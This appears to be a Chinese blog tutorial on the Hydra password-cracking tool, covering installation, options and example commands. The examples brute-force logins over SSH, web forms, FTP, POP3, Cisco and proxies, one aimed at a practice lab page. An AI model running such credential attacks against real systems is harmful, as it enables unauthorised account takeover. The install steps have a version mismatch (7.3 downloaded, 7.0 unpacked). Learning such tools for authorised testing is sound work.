1.hydra简介
hydra是一款万能爆破工具,成功与否取决于字典,可以爆破AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。
2.安装
如果是Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装:
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra
Redhat/Fedora发行版的下载源码包编译安装,先安装相关依赖包:
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel
hydra下载地址:http://www.thc.org/releases/hydra-7.3.tar.gz
# tar zxvf hydra-7.0-src.tar.gz
# cd hydra-7.0-src
# ./configure
# make
# make install
3.参数
hydra <ip> <服务>
可选
- -l #指定用户名
- -L #指定用户名字典
- -p #指定密码
- -P #指定密码文件路径
- -t #指定线程默认16
- -e ns #n:空密码试探,s:使用指定用户和密码试探
- -f #找到第一对登录名或者密码的时候中止破解
- -o #指定结果输出到的文件
- -s #指定端口
- -R #继续从上一次进度接着破解
- -S #采用SSL链接
- -w #最大超时时间,默认30秒
- -v/-V #显示详细过程
<必选>
- ip #目标ip
- server #指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp
4.案例
hydra -l root -t 64 -P /usr/share/john/password.lst 4.4.7.100 ssh
- 爆破web登录(GET)
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/ - 爆破web登录(POST)
hydra -l admin -P /usr/share/john/password.lst -s 端口 目标ip http-post-form "/Less-11/index.php:uname=^USER^&passwd=^PASS^&submit=Submit:slap.jpg"
http-post-form ""#申明post表单
/Less-11/index.php:username=^USER^&password=^PASS^:slap.jpg #ip地址后面跟的路径:post提交的东西:失败时返回的源码文字。
&submit=Submit:S="Password:1"" #S=""成功时源码上的字,不要出现:这个,否则会报错。 - 爆破https
hydra -m /index.php -l admin -P pass.txt ip https - 爆破ssh
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh - 爆破ftp
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) –vV - 爆破pop3
hydra -l admin -P pass.txt my.pop3.mail pop3 - 爆破cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable - http-porxy
hydra -l admin -P pass.txt http-proxy://ip - 后面的都是同理不列举了!
Comments NOTHING